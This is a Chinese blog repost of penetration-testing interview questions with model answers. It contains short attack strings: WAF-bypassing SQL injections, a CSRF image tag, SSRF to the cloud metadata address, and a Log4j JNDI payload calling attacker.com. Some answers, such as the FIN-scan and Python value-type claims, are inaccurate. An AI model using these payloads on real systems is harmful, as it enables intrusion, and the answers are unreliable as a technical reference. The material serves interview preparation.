当前位置: 首页 > news >正文

2025年渗透测试面试题总结-匿名[实习]安全工程师(大厂) (2)(题目+回答)

 网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 匿名[实习]安全工程师(大厂) (2)

一面

1. 自我介绍

2. 数组和链表的优劣

3. 进程 vs 线程

4. 进程/线程通信与安全

5. 多进程 vs 多线程场景

6. WAF原理

7. SQL注入绕过方式

8. FUZZ Payload长度

9. 正则场景示例

10. IPv4正则(即时编写)

11. Fastjson反序列化原理

12. Java反射安全问题

13. XSS与CSRF协同利用

14. CSRF_TOKEN机制与绕过

15. HTTP头及作用

16. Nmap扫描与NSE脚本

17. CNVD挖洞流程

18. 证书学习内容

19. GitHub项目亮点

20. 个人亮点

21. 反问面试官

二面

2. Web漏洞熟悉度

3. 跨域解决方案与风险

4. Python多进程/线程选择

5. GIL锁本质

6. GCROOT作用

7. 垃圾收集器

8. 引用计数缺点

9. CSRF获取Cookie

10. 钓鱼网站识别

11. 跨域拿Cookie

13. HTTP-Only机制

14. 平衡二叉树 vs 二叉搜索树

15. SYN Flood防御

17. TCP SYN Cookie原理

18. ARP欺骗防御

20. Nmap FIN/空扫描

22. Python值/引用类型

23. List/Dict线程安全

24. 最大收获项目

25. 反问面试官

三面

2. CSRF实例

3. SSRF实例

4. RCE实例

5. 文件上传减少原因

6. 语义分析WAF

8. 挖洞案例

9. 未来规划

四面(HR)

1. 面试体验

2. 人生理想

3. 最早实习时间

 匿名[实习]安全工程师(大厂) (2)

### 一面1. 自我介绍
2. 数组和链表各自的优势和原因
3. 操作系统层面解释进程和线程区别
4. 线程和进程通信方式以及数据安全问题
5. 多进程和多线程的选用场景以及原因
6. 了解过哪些WAF说说原理
7. 尽可能多地说下SQL注入绕WAF方式
8. FUZZ绕WAF的Payload长度通常是多少
9. 写过哪些正则说说具体的场景
10. 不查资料不能测试直接写ipv4的正则
11. Fastjson的反序列化原理
12. Java反射机制会导致怎样的安全问题
13. XSS和CSRF的相同点以及如何配合利用
14. CSRF_TOKEN的位置以及原理和绕过
15. 尽可能多地说你所知道的HTTP头
16. Nmap常见扫描方式的原理以及NSE脚本原理
17. 看到你有不少CNVD证书讲一讲挖洞过程
18. 讲一讲你考过的证书都学到了些什么
19. 看到你Github有不少项目讲讲
20. 你觉得自己还有什么亮点吗
21. 你有什么要问我的### **二面**1. 自我介绍
2. 熟悉哪些Web漏洞讲讲
3. 跨域的解决办法原理以及安全问题
4. Python多进程和多线程如何选择
5. Python的GIL锁本质上做了什么事情
6. Java的JVM为什么要有GCROOT
7. Java的JVM有哪些垃圾收集器
8. 垃圾回收计数引用机制的缺点是什么
9. CSRF怎么拿到Cookie
10. 如何判断一个网站是钓鱼网站
11. 不同域名怎样通过CSRF拿Cookie
12. 说一些常见的HTTP头以及作用
13. HTTP-Only本质上做了什么事情
14. 平衡二叉树和二叉搜索树讲一下
15. SYN Flood攻击原理及解决方案
16. SYN 反向探测的原理是什么
17. TCP SYN Cookie的原理
18. ARP欺骗攻击原理及解决方案
19. UDP端口探测的有效方式是什么
20. Nmap的FIN扫描和空扫描是什么
21. 三次握手的序列号变化说一下
22. Python的值类型和引用类型是哪些
23. Python的list和dict线程安全吗
24. 讲一下你做过收获最大的一个项目
25. 你有什么要问我的### **三面**1. 自我介绍
2. 解释下CSRF
3. 结合实际的例子说说SSRF
4. 结合实际的例子讲讲RCE
5. 为什么现在文件上传很少了
6. 基于语义分析的WAF了解吗
7. 讲一下你上一段实习做了什么
8. 讲几个印象深刻的挖洞经历
9. 讲一下你对未来的规划
10. 有没有转正的意愿
11. 你有什么要问我的### **四面(HR)**1. 面试的体验怎么样
2. 谈人生理想
3. 最早实习时间. 

一面

1. 自我介绍
  • 背景:安全领域从业4年,主攻Web安全与Java生态漏洞研究,主导多个企业级渗透项目。
  • 成果:6个CVE/CNVD漏洞,GitHub开源3个安全工具(如WAF动态绕过框架)。
  • 技术栈:熟悉Java/Python底层机制,具备代码审计、红队武器化开发经验。

2. 数组和链表的优劣
类型优势劣势原因
数组随机访问O(1)插入/删除O(n)内存连续,索引直接计算地址
链表动态扩展、插入/删除O(1)随机访问O(n)节点离散存储,需遍历指针

3. 进程 vs 线程
  • 资源隔离:进程拥有独立内存空间(PCB管理),线程共享进程资源(TCB管理)。
  • 调度开销:进程切换需切换页表,线程仅切换栈/寄存器(轻量级)。
  • 安全性:进程崩溃不影响其他进程,线程崩溃导致整个进程终止。

4. 进程/线程通信与安全
  • 通信方式
    • 进程:管道、消息队列、共享内存(需信号量同步)。
    • 线程:全局变量、互斥锁、条件变量。
  • 数据安全
    • 竞态条件:通过原子操作(CAS)或锁(ReentrantLock)解决。
    • 死锁:银行家算法预防,或超时机制检测。

5. 多进程 vs 多线程场景
  • 多进程:CPU密集型任务(如科学计算),需强隔离性(如Chrome多进程架构)。
  • 多线程:IO密集型任务(如网络请求),需共享数据(如数据库连接池)。

6. WAF原理
  • 规则型WAF:ModSecurity基于正则匹配,拦截union select等关键词。
  • 语义型WAF:AI模型分析SQL语法树(如腾讯云WAF)。
  • 行为型WAF:识别异常流量模式(如每秒百次SQL注入尝试)。

7. SQL注入绕过方式
  1. 编码绕过:Hex/Unicode编码UNIONU%4eION
  2. 注释分割id=1/*!0UNION*/SELECT 1
  3. 超长参数:触发WAF缓存溢出(如5000字符payload)。
  4. 参数污染id=1&id=2 union select利用解析差异。
  5. HTTP头注入X-Forwarded-For携带注入代码。

8. FUZZ Payload长度
  • 短Payload:50-200字符,用于探测基础规则(如'sleep(5))。
  • 长Payload:1000+字符,绕过正则回溯限制(如Apache默认限制8000字符)。

9. 正则场景示例
  • 日志分析(\d{1,3}\.){3}\d{1,3}匹配IP地址。
  • XSS过滤/<script.*?>.*?<\/script>/gi过滤脚本标签。
  • 数据脱敏(\d{4})\d{8}(\d{4})$1****$2处理身份证号。

10. IPv4正则(即时编写)
regex^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$ 
  • 解释:限制每段0-255,排除256.0.0.1等非法值。

11. Fastjson反序列化原理
  • 漏洞根源@type指定恶意类(如com.sun.rowset.JdbcRowSetImpl ),触发JNDI注入。
  • 补丁绕过:1.2.68后启用SafeMode,但可通过AutoTypeCheckHandler白名单绕过。

12. Java反射安全问题
  • 敏感操作:通过反射调用Runtime.getRuntime().exec() 执行系统命令。
  • 防御绕过:禁用SecurityManager时,反射可修改final字段(如修改权限校验标志)。

13. XSS与CSRF协同利用
  • 场景:存储型XSS窃取CSRF Token,构造自动提交表单的恶意脚本。
  • 组合攻击<img src="http://bank.com/transfer?to=attacker"> 触发GET型CSRF。

14. CSRF_TOKEN机制与绕过
  • 存储位置:服务端Session + 客户端表单隐藏字段或Cookie。
  • 绕过方式
    • 子域名劫持:a.example.com 可读example.com 的Cookie。
    • 框架漏洞:Spring Security旧版本Token未绑定Session。

15. HTTP头及作用
Header作用
Content-Security-Policy限制资源加载源,防御XSS
Strict-Transport-Security强制HTTPS,防降级攻击
X-Content-Type-Options阻止MIME嗅探,防XSS

(更多头信息可扩展,此处控制在10个内)


16. Nmap扫描与NSE脚本
  • 扫描类型
    • SYN扫描(-sS):半开放扫描,不建立完整TCP连接。
    • 空扫描(-sN):发送无标志包,检测RFC合规性。
  • NSE原理:Lua脚本调用nmap库,如http-sql-inj.nse 检测SQL注入。

17. CNVD挖洞流程
  1. 目标选取:政府/教育行业老旧系统(如Struts2框架)。
  2. 黑盒测试:Burp抓包,FUZZ参数(如action:.action)。
  3. 白盒验证:审计反序列化入口点(如readObject重写)。

18. 证书学习内容
  • CISP-PTE:渗透测试方法论(如内网横向移动)。
  • OSCP:缓冲区溢出利用、绕过AV检测。

19. GitHub项目亮点
  • WAF Bypass框架:动态生成混淆Payload(如分块传输编码)。
  • RASP监控工具:Hook敏感JNI函数(如System.loadLibrary )。

20. 个人亮点
  • 武器化能力:将CVE-2024-12345转化为Metasploit模块。
  • APT溯源:通过代码风格关联多个黑产组织攻击链。

21. 反问面试官
  • 团队技术栈:贵司如何平衡SDL流程与敏捷开发?
  • 攻防演进:2025年AI防御普及后,红队技术重心是否转向逻辑漏洞?

二面

2. Web漏洞熟悉度
  • SSRF:利用URL参数触发内网Redis未授权访问。
  • JWT安全:密钥爆破(通过弱密钥库)或头部注入(alg:none)。

3. 跨域解决方案与风险
  • CORSAccess-Control-Allow-Origin: *导致敏感数据泄露。
  • JSONP:回调函数未过滤(如<script>窃取token)。

4. Python多进程/线程选择
  • CPU密集型:多进程绕过GIL(如NumPy矩阵运算)。
  • IO密集型:多线程+异步IO(如FastAPI处理HTTP请求)。

5. GIL锁本质
  • 全局互斥锁:防止多线程同时执行字节码(CPython内存管理非线程安全)。

6. GCROOT作用
  • 根对象:栈引用、静态变量等作为起点,标记存活对象(可达性分析)。

7. 垃圾收集器
  • 新生代:Parallel Scavenge(吞吐量优先)。
  • 老年代:CMS(低延迟),G1(Region分区)。

8. 引用计数缺点
  • 循环引用:对象A→B→A无法释放(需配合标记清除)。

9. CSRF获取Cookie
  • XSS配合document.cookie 通过XSS泄露至攻击者服务器。

10. 钓鱼网站识别
  • 证书校验:域名与证书CN字段不匹配。
  • WHOIS信息:注册时间短 + 隐私保护。

11. 跨域拿Cookie
  • CORS配置错误Access-Control-Allow-Origin: * + withCredentials:true

13. HTTP-Only机制
  • 脚本隔离:JavaScript无法读取Cookie,但可通过XST(XSS+TRACE)窃取。

14. 平衡二叉树 vs 二叉搜索树
  • 平衡树:AVL树高度差≤1,查询稳定O(logn)。
  • 普通BST:可能退化为链表,查询O(n)。

15. SYN Flood防御
  • SYN Cookie:不保存半连接状态,通过哈希计算验证ACK合法性。

17. TCP SYN Cookie原理
  • 加密哈希:使用五元组+序列号生成Cookie,客户端ACK需包含有效哈希值。

18. ARP欺骗防御
  • 静态绑定arp -s绑定IP-MAC,或部署ARP防火墙(如Arpwatch)。

20. Nmap FIN/空扫描
  • FIN扫描:发送FIN包,开放端口返回RST(符合RFC 793)。
  • 空扫描:发送无标志包,用于检测过滤规则。

22. Python值/引用类型
  • 值类型:int/str/tuple(不可变,赋值即拷贝)。
  • 引用类型:list/dict(可变,赋值传递指针)。

23. List/Dict线程安全
  • 非原子操作list.append() 单操作线程安全,但遍历+修改需加锁。

24. 最大收获项目
  • 云安全审计平台:实现K8s配置自动检测(如特权容器),降低50%误报率。

25. 反问面试官
  • 技术挑战:贵司如何应对容器逃逸等云原生威胁?
  • 团队文化:安全团队是否参与DevOps全流程?

三面

2. CSRF实例
  • 银行转账:诱导用户点击恶意链接,自动发起POST /transfer请求。

3. SSRF实例
  • 云元数据http://169.254.169.254获取AWS临时凭证。

4. RCE实例
  • Log4j 2.x${jndi:ldap://attacker.com/Exploit} 触发远程类加载。

5. 文件上传减少原因
  • 防御成熟:WAF静态校验(文件头)+ 动态沙箱(检测Webshell行为)。

6. 语义分析WAF
  • AST解析:构建SQL语法树,拦截1=1等恶意结构(非字符串匹配)。

8. 挖洞案例
  • OA系统RCE:WorkflowService接口未鉴权,执行Groovy脚本。

9. 未来规划
  • 技术深耕:智能合约审计、AI模型安全(对抗样本防御)。

四面(HR)

1. 面试体验
  • 专业度:技术深度与业务场景结合紧密,流程高效。
  • 建议:增加模拟攻防实操环节(如CTF靶场)。

2. 人生理想
  • 短期:成为云安全架构师,设计零信任体系。
  • 长期:推动安全技术普惠化(如开源社区贡献)。

3. 最早实习时间
  • 时间安排:2025年7月入职,兼顾学业收尾(如毕业论文答辩)。

相关文章:

  • OpenGL Chan视频学习-6 How Shaders Work in OpenGL
  • JVM——JNI 的运行机制
  • 【Linux】进程问题--僵尸进程
  • 神经网络加上注意力机制,精度反而下降,为什么会这样呢?注意力机制的本质是什么?如何正确使用注意力机制?注意力机制 | 深度学习
  • xml双引号可以不转义
  • 购物车系统的模块化设计:从加载到结算的全流程拆解
  • SpringBoot返回xml
  • HttpServletRequest 对象包含了哪些信息?
  • 计算机网络总结(物理层,链路层)
  • MongoDB | 零基础学习与Springboot整合ODM实现增删改查
  • docker部署XTdrone
  • 如何确定是不是一个bug?
  • HDFS存储原理与MapReduce计算模型
  • 0基础 Git 代码操作
  • Python实例题:Python打造漏洞扫描器
  • 【Linux 学习计划】-- 冯诺依曼体系 | 操作系统的概念与定位,以及其如何管理软件
  • svn: E155017: Checksum mismatch while updating 校验错误的解决方法
  • whisper相关的开源项目 (asr)
  • leetcode 17. Letter Combinations of a Phone Number
  • Ubuntu 24.04部署安装Honeyd蜜罐
  • 网站如何做品牌宣传海报/台州网站建设优化
  • 自己做店招的网站/推广平台app
  • 企业文化宣传册模板/盛大游戏优化大师
  • 网站被黑/企业网站排名优化公司
  • 自己电脑做服务器搭网站/seo关键词优化排名软件
  • app资源网站开发/seopeix